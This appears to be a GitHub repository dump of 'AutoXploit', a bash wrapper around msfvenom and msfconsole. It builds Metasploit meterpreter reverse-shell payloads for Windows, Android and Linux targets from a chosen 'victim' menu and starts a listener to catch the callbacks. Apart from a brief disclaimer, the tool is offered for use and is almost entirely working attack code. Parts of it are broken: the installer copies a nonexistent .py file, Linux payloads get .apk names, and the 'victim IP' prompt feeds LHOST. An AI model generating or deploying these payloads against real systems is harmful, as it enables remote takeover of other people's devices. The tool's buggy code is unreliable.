├── LICENSE ├── README.md ├── autoxploit.sh └── install.sh /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2019, y_k_007 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

AutoXploit

2 | 3 | 4 |

Auto Payload Generator & Exploiter

5 | 6 |

Screenshot-from-2019-12-14-15-11-04

7 |

8 | AutoXploit is simply a shell sciript that helps you to generate metasploit payloads and starts the meterpreter handler quickly. At times, security researchers have to generate payloads and listen to the connection through handler constantly, AutoXploit not only allows you to quickly generate payloads but it also has an option to start the handler automatically. 9 | 10 | ### Prerequisite 11 | You should have a linux based system with metasploit-framework installed. 12 | 13 | ### Installation 14 | Run `install.sh` as sudo and it will automatically install AutoXploit. 15 | ``` 16 | $ git clone https://github.com/Yashvendra/AutoXploit.git 17 | $ cd AutoXploit 18 | $ chmod +x install.sh 19 | $ sudo ./install.sh 20 | ``` 21 | 22 | ### Usage 23 | Make sure you run this script as super user. 24 | ``` 25 | $ sudo autoxploit 26 | ``` 27 | ### Gallery 28 | Screenshot-from-2019-12-23-20-29-59

29 | 30 | ### Upcoming Updates 31 | Auxiliary scanners are on the way :) 32 | 33 | ##### Note: This script is made for educational purposes and to help security researchers. Any actions or activities performed using this script is solely your responsibility. 34 | -------------------------------------------------------------------------------- /autoxploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | Black='\033[1;30m' # Black 3 | Red='\033[1;31m' # Red 4 | Green='\033[1;32m' # Green 5 | Yellow='\033[1;33m' # Yellow 6 | Blue='\033[1;34m' # Blue 7 | Purple='\033[1;35m' # Purple 8 | Cyan='\033[1;36m' # Cyan 9 | White='\033[1;37m' # White 10 | NC='\033[0m' 11 | blue='\033[0;34m' 12 | white='\033[0;37m' 13 | lred='\033[0;31m' 14 | 15 | root=$( id -u ) 16 | folder='~/Desktop/payloads' 17 | 18 | 19 | 20 | logo () { 21 | echo -e "\033[1;31m \t 22 | \t░█▀█░█░█░▀█▀░█▀█░█░█░█▀█░█░░░█▀█░▀█▀░▀█▀ 23 | \t░█▀█░█░█░░█░░█░█░▄▀▄░█▀▀░█░░░█░█░░█░░░█░ 24 | \t░▀░▀░▀▀▀░░▀░░▀▀▀░▀░▀░▀░░░▀▀▀░▀▀▀░▀▀▀░░▀░ 25 | \033[1;36m--=By: Yashvendra Kashyap a.k.a y_k_007=-- 26 | "; 27 | 28 | } 29 | 30 | target () { 31 | echo -ne "\n${Blue}[#] Enter IP of the victim's machine: ${White}"; read ip 32 | echo -ne "${Blue}[#] Enter a Port no.: ${White}"; read port 33 | echo -ne "${Blue}[#] Enter the FILE name: ${White}"; read file 34 | } 35 | 36 | windows () { 37 | clear 38 | logo 39 | echo -e "\n" 40 | sleep 0.3 41 | echo -e "${Blue}+-------------------------------------------------------+" 42 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Windows${Yellow}] ${Blue} +" 43 | echo -e "${Blue}+-------------------------------------------------------+${NC}" 44 | sleep 0.3 45 | echo -ne "${Blue}+ " 46 | echo -e "${White}[1] ${Purple}windows/meterpreter/reverse_tcp ${Blue} +" 47 | echo -e "+ ${White}[2] ${Purple}windows/meterpreter/reverse_http ${Blue} +" 48 | echo -e "+ ${White}[3] ${Purple}windows/meterpreter/reverse_tcp_dns ${Blue} +" 49 | echo -e "+ ${White}[4] ${Purple}windows/meterpreter/reverse_https ${Blue} +" 50 | echo -e "+ ${White}[5] ${Purple}windows/meterpreter/reverse_tcp_uuid ${Blue} +" 51 | echo -e "+ ${White}[6] ${Purple}windows/meterpreter/reverse_winhttp ${Blue} +" 52 | echo -e "+ ${White}[7] ${Purple}windows/meterpreter/reverse_winhttps ${Blue} +" 53 | echo -e "${Blue}+-------------------------------------------------------+" 54 | sleep 0.3 55 | echo -ne "${Green}[#] Choose a payload: ${White}" 56 | read payloadWindow 57 | 58 | case $payloadWindow in 59 | 60 | 1) 61 | target 62 | echo 63 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 64 | echo 65 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 66 | payload='windows/meterpreter/reverse_tcp' ;; 67 | 68 | 2) 69 | target 70 | echo 71 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 72 | echo 73 | msfvenom -p windows/meterpreter/reverse_http LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 74 | payload='windows/meterpreter/reverse_http' ;; 75 | 76 | 3) 77 | target 78 | echo 79 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 80 | echo 81 | msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 82 | payload='windows/meterpreter/reverse_tcp_dns' ;; 83 | 84 | 4) 85 | target 86 | echo 87 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 88 | echo 89 | msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 90 | payload='windows/meterpreter/reverse_https' ;; 91 | 92 | 5) 93 | target 94 | echo 95 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 96 | echo 97 | msfvenom -p windows/meterpreter/reverse_tcp_uuid LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 98 | payload='windows/meterpreter/reverse_tcp_uuid' ;; 99 | 100 | 6) 101 | target 102 | echo 103 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 104 | echo 105 | msfvenom -p windows/meterpreter/reverse_winhttp LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 106 | payload='windows/meterpreter/reverse_winhttp' ;; 107 | 108 | 7) 109 | target 110 | echo 111 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 112 | echo 113 | msfvenom -p windows/meterpreter/reverse_winhttps LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 114 | payload='windows/meterpreter/reverse_winhttps' ;; 115 | 116 | *) 117 | echo -e "${Cyan}[*] INVALID CHOICE!" 118 | sleep 1 119 | exit ;; 120 | 121 | esac 122 | } 123 | 124 | android () { 125 | clear 126 | logo 127 | echo -e "\n" 128 | echo -e "${Blue}+-------------------------------------------------------+" 129 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Android${Yellow}] ${Blue} +" 130 | echo -e "${Blue}+-------------------------------------------------------+${NC}" 131 | sleep 0.3 132 | echo -ne "${Blue}+ " 133 | echo -e "${White}[1] ${Purple}android/meterpreter/reverse_tcp ${Blue} +" 134 | echo -e "+ ${White}[2] ${Purple}android/meterpreter/reverse_https ${Blue} +" 135 | echo -e "+ ${White}[3] ${Purple}android/meterpreter/reverse_http ${Blue} +" 136 | echo -e "${Blue}+-------------------------------------------------------+" 137 | sleep 0.3 138 | echo -ne "${Green}[#] Choose a payload: ${White}" 139 | read payloadAndro 140 | 141 | case $payloadAndro in 142 | 143 | 1) 144 | target 145 | echo 146 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 147 | echo 148 | msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 149 | payload='android/meterpreter/reverse_tcp' ;; 150 | 151 | 2) 152 | target 153 | echo 154 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 155 | echo 156 | msfvenom -p android/meterpreter/reverse_https LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 157 | payload='android/meterpreter/reverse_https' ;; 158 | 159 | 3) 160 | target 161 | echo 162 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 163 | echo 164 | msfvenom -p android/meterpreter/reverse_http LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 165 | payload='android/meterpreter/reverse_http' ;; 166 | 167 | * ) 168 | echo -e "${Cyan}[*] INVALID CHOICE!" 169 | sleep 1 170 | exit ;; 171 | 172 | esac 173 | } 174 | 175 | linux (){ 176 | clear 177 | logo 178 | echo -e "\n" 179 | echo -e "${Blue}+-------------------------------------------------------+" 180 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Linux${Yellow}] ${Blue} +" 181 | echo -e "${Blue}+-------------------------------------------------------+${NC}" 182 | sleep 0.3 183 | echo -ne "${Blue}+ " 184 | echo -e "${White}[1] ${Purple}linux/x86/meterpreter_reverse_tcp ${Blue} +" 185 | echo -e "+ ${White}[2] ${Purple}linux/x86/meterpreter_reverse_https ${Blue} +" 186 | echo -e "+ ${White}[3] ${Purple}linux/x86/meterpreter_reverse_http ${Blue} +" 187 | echo -e "+ ${White}[4] ${Purple}linux/x86/meterpreter/reverse_tcp_uuid ${Blue} +" 188 | echo -e "+ ${White}[5] ${Purple}linux/x86/meterpreter/reverse_ipv6_tcp ${Blue} +" 189 | echo -e "+ ${White}[6] ${Purple}linux/x86/meterpreter/reverse_nonx_tcp ${Blue} +" 190 | echo -e "${Blue}+-------------------------------------------------------+" 191 | sleep 0.3 192 | echo -ne "${Green}[#] Choose a payload: ${White}" 193 | read payloadlinux 194 | 195 | case $payloadlinux in 196 | 197 | 1) 198 | target 199 | echo 200 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 201 | echo 202 | msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 203 | payload='linux/x86/meterpreter_reverse_tcp' ;; 204 | 205 | 2) 206 | target 207 | echo 208 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 209 | echo 210 | msfvenom -p linux/x86/meterpreter_reverse_https LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 211 | payload='linux/x86/meterpreter_reverse_https' ;; 212 | 213 | 3) 214 | target 215 | echo 216 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 217 | echo 218 | msfvenom -p linux/x86/meterpreter_reverse_http LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 219 | payload='linux/x86/meterpreter_reverse_http' ;; 220 | 221 | 4) 222 | target 223 | echo 224 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 225 | echo 226 | msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 227 | payload='linux/x86/meterpreter/reverse_tcp_uuid' ;; 228 | 229 | 5) 230 | target 231 | echo 232 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 233 | echo 234 | msfvenom -p linux/x86/meterpreter/reverse_ipv6_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 235 | payload='linux/x86/meterpreter/reverse_ipv6_tcp' ;; 236 | 237 | 6) 238 | target 239 | echo 240 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 241 | echo 242 | msfvenom -p linux/x86/meterpreter/reverse_nonx_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 243 | payload='linux/x86/meterpreter/reverse_nonx_tcp' ;; 244 | 245 | 246 | * ) 247 | echo -e "${Cyan}[*] INVALID CHOICE!" 248 | sleep 1 249 | exit ;; 250 | 251 | esac 252 | } 253 | 254 | 255 | if [ $root != 0 ] ; then 256 | echo -e "${Purple}[#] Run this Script as 'sudo'! " 257 | sleep 2 258 | exit 259 | fi 260 | 261 | if [ -e $folder ] ; then 262 | cd ~/Desktop/payloads 263 | else 264 | mkdir ~/Desktop/payloads && cd ~/Desktop/payloads 265 | fi 266 | 267 | 268 | clear 269 | logo 270 | sleep 0.3 271 | echo -e "${Yellow}[*] Payloads are available For-\n" 272 | sleep 0.3 273 | echo -e " ${White}[1] ${Blue}Windows" 274 | echo -e " ${White}[2] ${Blue}Android" 275 | echo -e " ${White}[3] ${Blue}Linux\n" 276 | sleep 0.3 277 | echo -ne "${Green}[#] Choose Victim's OS:${White} " 278 | read OS 279 | 280 | case $OS in 281 | 282 | 1) 283 | windows;; 284 | 285 | 2) 286 | android ;; 287 | 288 | 3) 289 | linux ;; 290 | 291 | * ) 292 | echo -e "${Cyan}[*] INVALID OPTION" 293 | sleep 1 294 | echo -e "${Cyan}[*] Exiting..." 295 | sleep 0.2 296 | exit ;; 297 | 298 | esac 299 | 300 | echo -e "${Purple}[*] Payload has been saved in the desktop folder '${Cyan}payloads${Purple}'" 301 | sleep 0.3 302 | echo -ne "${Green}[#] Do you want to automatically configure the handler and let it listen? [${Cyan}y${Green}/${Cyan}n${Green}]: ${White}" 303 | read p 304 | if [ $p = "y" ] 305 | then 306 | clear 307 | echo -e "${Green}[*] OPENING ${Purple}MSFCONSOLE${Green}... " 308 | msfconsole -q -x "use multi/handler; set PAYLOAD $payload ; set LHOST $ip ; set LPORT $port ; exploit " 309 | elif [ $p = "n" ] 310 | then 311 | echo -e "${Cyan}[*] Byee! See you soon." 312 | sleep 0.2 313 | exit 314 | else 315 | echo -e "${Cyan}[*] INVALID OPTION" 316 | sleep 0.2 317 | echo -e "${Cyan}[*] Exiting..." 318 | sleep 0.2 319 | exit 320 | fi 321 | 322 | 323 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | Green='\033[0;32m' 3 | white='\033[0;37m' 4 | NC='\033[0m' 5 | clear 6 | printf '\033]2; INSTALLER\a' 7 | echo -e "${Green}[*] Press \e[0;33many key\e[0;32m to install AutoXploit..." 8 | read -n 1 9 | clear 10 | 11 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" 12 | 13 | if [[ "$DIR" != "/root/AutoXploit" ]] 14 | then 15 | echo -e "\033[0;35m[~] I will install it for you..." 16 | sleep 4 17 | if [[ -d /root/AutoXploit ]] 18 | then 19 | rm -r /root/AutoXploit 20 | fi 21 | mkdir /root/AutoXploit 22 | cp -r "$DIR"/* /root/AutoXploit 23 | chmod +x /root/AutoXploit/install.sh 24 | #gnome-terminal -- bash -c "sudo /root/bootmiester/install.sh; exec bash" 25 | fi 26 | echo -e "${Green}[+] Installing AutoXploit..." 27 | sleep 1 28 | echo -e "${Green}[+] Fixing permissions..." 29 | sleep 2 30 | chmod +x /root/AutoXploit/autoxploit.py 31 | clear 32 | echo -e "${Green}[+] Copying Tool to /bin/autoxploit" 33 | cd /root/AutoXploit 34 | cp /root/AutoXploit/autoxploit.py /bin/autoxploit 35 | clear 36 | 37 | while true 38 | do 39 | clear 40 | echo -e "${Green}[*] Are you \e[0;33mu\e[0;32mpdating or \e[0;33mi\e[0;32mnstalling the script?(\e[0;33mu\e[0;32m/\e[0;33mi\e[0;32m): " 41 | echo -e "${Green}[#] Only use 'i' for the first time." 42 | read UORI 43 | if [[ "$UORI" = "u" ]] 44 | then 45 | clear 46 | echo -e "This feature is currently under construction.." 47 | sleep 3 48 | exit 49 | elif [[ "$UORI" = "i" ]] 50 | then 51 | clear 52 | BASHCHECK=$(cat ~/.bashrc | grep "/bin/autoxploit") 53 | if [[ "$BASHCHECK" != "" ]] 54 | then 55 | echo -e "I SAID USE i ONLY ONE TIME..........." 56 | sleep 3 57 | break 58 | fi 59 | echo -e "${Green}[#] Adding AutoXploit to PATH so you can access it from anywhere" 60 | sleep 1 61 | export PATH=/bin/autoxploit:$PATH 62 | sleep 1 63 | echo "export PATH=/bin/autoxploit:$PATH" >> ~/.bashrc 64 | sleep 1 65 | clear 66 | break 67 | fi 68 | done 69 | sleep 1 70 | echo -e "${Green}[#] Installation is finished. Type 'sudo autoxploit' to launch the script after we exit." 71 | sleep 0.5 72 | echo -en "${Green}[+] Starting AutoXploit"; sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ; 73 | sudo autoxploit 74 | 75 | 76 | --------------------------------------------------------------------------------